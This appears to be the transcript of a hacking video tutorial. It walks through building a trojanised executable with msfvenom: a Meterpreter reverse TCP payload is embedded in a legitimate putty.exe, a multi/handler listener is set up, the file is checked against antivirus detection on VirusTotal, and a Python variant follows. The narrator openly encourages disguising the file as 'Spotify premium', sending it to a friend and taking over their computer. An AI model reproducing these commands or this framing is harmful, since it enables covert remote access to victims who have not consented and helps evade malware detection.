Okay, till now we have learned how to create a payload. We have learned how to create different payloads, but now what we are going to do is create a payload that looks like a simple application that is running on your Windows system. For example, you download a Spotify.exe file sent by your friend and he said that file is a premium Spotify APK. What you will do is just click on that file and it will just simply execute on your system, but it won't open, and you will think that this file is useless, but till then your friend, who might be a hacker, would have gained access over your system. So let's know how we can create similar files. So as we can see on our terminal that this command -x is for creating templates. It specifies a custom executable file to use it as a template. So what we are going to do now is first download an executable file. So here we will just download a file. In my case, I'm going to download putty.exe, and here we will just click on download putty, and here we are targeting a 64-bit operating system, so we will just download this one. So we are going to download this one, and as we click enter, you can see putty.ext is downloaded here. So if we go to the download location, we can see it is inside our downloads. Okay, that's cool, but now we have to open our terminal on the download directory, because you have to choose the executable file from where you have originally downloaded it. So let's again type that command, that is msf venom -p windows x64 meterpreter /reverse tcp. Here we will set our local host, that is 192.168.29.178. then we will set our local port, that will be 444, and now we will use -x command or -x command for using the template, and we will type putty.exe, and now we will type the extension format, and we will save this file as putty.exe, and we will just hit enter, and as we hit enter, the payload creation will start. So as you can see, the file is saved as putty.exe and its file size is 2 MB. So as we can see in our download directory, the putty.exe, which is just similar to this one, is downloaded here. Now let's test that on VirusTotal, if it is detectable or not. So if we go on the VirusTotal, we will choose file and we will select our putty.exe from here, and we will confirm the upload. So now what you can do is you can just create a file like this, maybe using a Spotify.exe, and create a Spotify.exe payload, run a exploit inside it, and send that to your friend. And what you will do next is just you will open Kali Linux terminal. You will just open a terminal, you will type msf console, and you will type this command we have been using since a long time, that is use exploit /multi handler, and hit enter. And now you will just go to the options, set payload to Windows x64 /meterpreter /reverse tcp. Then you will set localhost as your IP address of Kali Linux machine and hit enter, and you will just simply type run, and then send this payload to your friend. And once your friend executes that file thinking that it's a Spotify premium file, you will have access over his computer. You will have the root access, and even if it's not root access, you can easily bypass it. So let's create. So as we know, our previous payload was undetectable. So now let's create a payload in Python language so we can check if it is undetectable or not. So we will just go back here. We will customize this to Python, and we will name it as payload test.exe. And as we hit enter, we can see the Python. Okay, let's do some modifications here. It's not a exe file, it's a .py file. So as we hit enter, our Python format file is created. So let's just test this file on VirusTotal now. So if we go to virustotal.com once again, and here we will choose our payload and as you can see it has, let me show you on the desktop, that it has a Python logo as well. So this file is in Python and not Windows machine doesn't have Python installed. So if your friend has Python installed, you can definitely send him to this. And also let's try this on VirusTotal if it can be detected or not. Well, mostly Python files are undetectable because virus detection vendors sometimes ignore the Python extension file because very few of the people have Python installed on their system. So as we can see, some antiviruses vendor are detecting this file, so it is not fully undetectable. Sometimes it might work or sometimes it may not be. So out of 59 antivirus vendors, it is only detected by 4, and I don't think so those who detected this file as antivirus, as virus or Trojan is not prominent antivirus vendors. We definitely don't use these two of them in our daily life. So this file might help you in hacking your friend's system.